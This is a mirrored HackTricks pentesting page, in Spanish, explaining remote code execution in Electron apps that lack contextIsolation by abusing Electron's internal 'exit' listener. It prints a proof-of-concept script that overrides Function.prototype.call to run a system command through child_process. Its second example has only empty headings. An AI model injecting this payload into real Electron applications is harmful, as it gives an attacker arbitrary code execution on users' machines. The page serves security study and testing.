Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md

4.5 KiB
Raw Blame History

RCE de contextIsolation de Electron a través del código interno de Electron

Aprende a hackear AWS de cero a héroe con htARTE (Experto en Equipos Rojos de AWS de HackTricks)!

Ejemplo 1

Ejemplo de https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41

El listener del evento "exit" siempre es establecido por el código interno cuando se inicia la carga de la página. Este evento se emite justo antes de la navegación:

process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

{% embed url="664c184fcb/lib/common/asar.js (L30-L36)" %}

8a44289089/bin/events.js (L156-L231) -- Ya no existe

Luego va aquí:

Donde "self" es el objeto de proceso de Node:

El objeto de proceso tiene referencias a la función "require":

process.mainModule.require

Como el handler.call va a recibir el objeto process, podemos sobrescribirlo para ejecutar código arbitrario:

<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>

Ejemplo 2

Obtener el objeto require de la contaminación de prototipos. Desde https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81

Fuga:

Explotar:

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!